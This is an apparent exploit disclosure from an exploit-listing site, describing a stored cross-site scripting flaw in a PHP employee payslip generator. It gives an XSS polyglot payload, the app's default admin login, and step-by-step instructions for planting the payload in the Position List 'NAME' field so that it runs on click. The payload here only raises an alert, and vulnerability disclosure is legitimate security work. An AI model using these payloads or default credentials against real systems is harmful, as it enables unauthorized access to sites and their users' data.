Advertisement
# Title: Employee Payslip - XSS Polyglots # Author: @Eawhitehat - Eren Arslan # Demo available : https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html # CVE: N/A # XSS POLYGLOTS # Screenshot : https://prnt.sc/eeUxgczBF-Gj Used Payload : onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)// Admin account : admin admin123 Method : Connect to panel with admin acc : http://.../admin/ #Vulnerablity 1. After login with SUPER ADMIN, go to http://.../admin/?page=positions (Position List page) 2. "Create New" and add in "NAME" the payload : onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)// 3. After New Position created, click in the form for exec your payload XSS Polyglots Enjoy !
Copyright ©2023 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.